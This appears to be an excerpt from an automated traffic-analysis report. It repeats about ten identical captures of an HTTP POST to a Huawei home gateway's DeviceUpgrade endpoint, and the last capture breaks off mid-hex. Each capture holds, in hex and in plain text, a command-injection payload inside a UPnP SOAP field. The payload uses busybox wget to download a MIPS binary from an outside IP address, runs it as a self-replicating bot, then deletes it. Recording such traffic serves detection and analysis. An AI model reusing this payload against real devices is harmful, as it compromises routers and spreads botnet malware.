Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 32 30 31 2e 32 38 2e 31 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 69 64 6b 2f 68 6f 6d 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 48 75 61 77 65 69 2e 53 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 74.201.28.102 -l /tmp/bigH -r /idk/home.mips;chmod 777 /tmp/bigH;/tmp/bigH Huawei.Selfrep;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 